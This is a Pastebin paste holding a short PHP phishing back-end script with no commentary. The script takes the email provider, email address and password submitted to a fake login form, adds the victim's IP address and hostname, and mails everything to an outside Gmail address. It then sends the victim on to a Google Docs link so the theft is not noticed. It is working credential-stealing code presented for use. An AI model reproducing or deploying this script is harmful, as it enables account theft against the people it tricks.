Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $ip = getenv("REMOTE_ADDR");
- $hostname = gethostbyaddr($ip);
- $message .= "PROVIDER : ".$_POST['provider']."\n";
- $message .= "Email ID : ".$_POST['Email']."\n";
- $message .= "Password : ".$_POST['Passwd']."\n\n";
- $message .= "Client IP : ".$ip."\n";
- $message .= "HostName : ".$hostname."\n";
- $from = "From: ToLL<WIN>";
- $subj = "Gidi";
- mail("thetruthfulones@gmail.com",$subj,$message,$from);
- header("Location: https://docs.google.com/document/d/1j1mT7taCkaEE3UkKWuhUJs7sViXcgNOuV7ShSh-LV8U/edit?usp=sharing");
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement